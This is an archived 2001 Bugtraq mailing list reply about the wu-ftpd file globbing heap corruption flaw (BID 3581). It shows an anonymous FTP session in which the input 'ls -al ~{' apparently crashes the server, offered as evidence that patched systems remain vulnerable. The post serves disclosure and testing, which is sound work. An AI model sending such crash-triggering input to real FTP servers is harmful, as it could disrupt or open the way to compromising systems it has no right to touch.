Bugtraq mailing list archives
Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
From: <goba () Leu Braila Astral Ro>
Date: Sun, 2 Dec 2001 18:07:34 +0200 (EET)
On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:
Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
[teste@XXX teste]$ ftp test.somehost.com
Connected to test.somehost.com.
220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (test:teste): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230-The response 'baubau' is not valid
230-Next time please use your e-mail address as your password
230- for example: joe () test somehost com
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (194,105,27,22,166,166)
550 Missing }
ftp> ls -al ~{
Segmentation fault (core dumped)
As you can see the problem still exist, even if updates are done.
Goba
Current thread:
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Hasan Azam Diwan (Dec 01)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Travis Siegel (Dec 02)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability goba (Dec 02)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Morten Poulsen (Dec 03)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Jedi/Sector One (Dec 03)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Morten Poulsen (Dec 03)
- <Possible follow-ups>
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Patrick Cantwell (Dec 05)